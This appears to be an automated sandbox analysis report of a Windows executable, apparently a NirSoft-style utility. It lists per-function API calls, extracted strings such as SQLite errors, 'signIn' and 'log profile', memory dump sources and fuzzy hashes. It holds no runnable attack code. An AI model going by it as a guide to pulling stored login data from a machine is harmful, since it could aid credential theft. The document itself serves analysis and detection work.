                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                • memset.MSVCRT ref: 0040DA23
                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                Strings
                                Similarity
                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                • String ID: caption
                                • API String ID: 973020956-4135340389
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                Similarity
                                • API ID: memset$_snwprintf$wcscpy
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                • API String ID: 1283228442-2366825230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcschr.MSVCRT ref: 00413972
                                • wcscpy.MSVCRT ref: 00413982
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                • wcscpy.MSVCRT ref: 004139D1
                                • wcscat.MSVCRT ref: 004139DC
                                • memset.MSVCRT ref: 004139B8
                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                • memset.MSVCRT ref: 00413A00
                                • memcpy.MSVCRT ref: 00413A1B
                                • wcscat.MSVCRT ref: 00413A27
                                Strings
                                Similarity
                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                • String ID: \systemroot
                                • API String ID: 4173585201-1821301763
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                • GetLastError.KERNEL32 ref: 0040995D
                                • CloseHandle.KERNEL32(?), ref: 00409969
                                • GetLastError.KERNEL32 ref: 00409974
                                • CloseClipboard.USER32 ref: 0040997D
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: wcscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 1284135714-318151290
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                • String ID: 0$6
                                • API String ID: 4066108131-3849865405
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004082EF
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                • memset.MSVCRT ref: 00408362
                                • memset.MSVCRT ref: 00408377
                                Similarity
                                • API ID: memset$ByteCharMultiWide
                                • String ID:
                                • API String ID: 290601579-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: memcpy$memchrmemset
                                • String ID: PD$PD
                                • API String ID: 1581201632-2312785699
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                • GetDC.USER32(00000000), ref: 00409F6E
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                • GetParent.USER32(?), ref: 00409FA5
                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                Similarity
                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                • String ID:
                                • API String ID: 2163313125-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: ??3@$wcslen
                                • String ID:
                                • API String ID: 239872665-3916222277
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                • memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                • _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Similarity
                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                • API String ID: 3883404497-2982631422
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: memcpywcslen$_snwprintfmemset
                                • String ID: %s (%s)$YV@
                                • API String ID: 3979103747-598926743
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                • wcslen.MSVCRT ref: 0040A6B1
                                • wcscpy.MSVCRT ref: 0040A6C1
                                • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                • wcscpy.MSVCRT ref: 0040A6DB
                                Strings
                                Similarity
                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                • String ID: Unknown Error$netmsg.dll
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 0040DAFB
                                • wcscpy.MSVCRT ref: 0040DB0B
                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                Strings
                                Similarity
                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • unable to open database: %s, xrefs: 0042F84E
                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                • database %s is already in use, xrefs: 0042F6C5
                                • database is already attached, xrefs: 0042F721
                                • out of memory, xrefs: 0042F865
                                • too many attached databases - max %d, xrefs: 0042F64D
                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                • memcpy.MSVCRT ref: 0040EB80
                                • memcpy.MSVCRT ref: 0040EB94
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                Strings
                                Similarity
                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                • String ID: ($d
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                • GetLastError.KERNEL32 ref: 004178FB
                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                Similarity
                                • API ID: File$ErrorLastLockSleepUnlock
                                • String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00407E44
                                • memset.MSVCRT ref: 00407E5B
                                • _mbscpy.MSVCRT ref: 00407E7E
                                • _mbscpy.MSVCRT ref: 00407ED7
                                • _mbscpy.MSVCRT ref: 00407EEE
                                • _mbscpy.MSVCRT ref: 00407F01
                                • wcscpy.MSVCRT ref: 00407F10
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Similarity
                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                • String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                • GetLastError.KERNEL32 ref: 0041855C
                                • Sleep.KERNEL32(00000064), ref: 00418571
                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                • GetLastError.KERNEL32 ref: 0041858E
                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                Similarity
                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                • String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                • memset.MSVCRT ref: 00413ADC
                                • memset.MSVCRT ref: 00413AEC
                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                • memset.MSVCRT ref: 00413BD7
                                • wcscpy.MSVCRT ref: 00413BF8
                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                Strings
                                Similarity
                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                • String ID: 3A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                • wcslen.MSVCRT ref: 0040D1D3
                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                Strings
                                Similarity
                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                • String ID: strings
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00411AF6
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 00411B14
                                • wcscat.MSVCRT ref: 00411B2E
                                Strings
                                Similarity
                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                • String ID: AE$.cfg$General$EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040D8BD
                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                • memset.MSVCRT ref: 0040D906
                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                • _wcsicmp.MSVCRT ref: 0040D92F
                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                Strings
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                • String ID: sysdatetimepick32
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: -journal$-wal
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                Similarity
                                • API ID: Item$Dialog$MessageSend
                                • String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcsicmp.MSVCRT ref: 00444D09
                                • _wcsicmp.MSVCRT ref: 00444D1E
                                • _wcsicmp.MSVCRT ref: 00444D33
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                Strings
                                Similarity
                                • API ID: _wcsicmp$wcslen$_memicmp
                                • String ID: .save$http://$https://$log profile$signIn
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetClientRect.USER32(?,?), ref: 00405F65
                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                • GetWindow.USER32(00000000), ref: 00405F80
                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$ItemMessageRectSend$Client
                                • String ID:
                                • API String ID: 2047574939-0
                                • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EmptyClipboard.USER32 ref: 00409882
                                • wcslen.MSVCRT ref: 0040988F
                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                • memcpy.MSVCRT ref: 004098B5
                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                • CloseClipboard.USER32 ref: 004098D7
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                • String ID:
                                • API String ID: 2014503067-0
                                • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                • memcpy.MSVCRT ref: 0044A8BF
                                • memcpy.MSVCRT ref: 0044A90C
                                • memcpy.MSVCRT ref: 0044A988
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                • memcpy.MSVCRT ref: 0044A9D8
                                • memcpy.MSVCRT ref: 0044AA19
                                • memcpy.MSVCRT ref: 0044AA4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy
                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                • API String ID: 3510742995-2446657581
                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                • memset.MSVCRT ref: 00405ABB
                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                • SetFocus.USER32(?), ref: 00405B76
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintfwcscat
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 384018552-4153097237
                                • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetwcschr
                                • String ID: 0$6
                                • API String ID: 2029023288-3849865405
                                • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                • memset.MSVCRT ref: 00405455
                                • memset.MSVCRT ref: 0040546C
                                • memset.MSVCRT ref: 00405483
                                • memcpy.MSVCRT ref: 00405498
                                • memcpy.MSVCRT ref: 004054AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$memcpy$ErrorLast
                                • String ID: 6$\
                                • API String ID: 404372293-1284684873
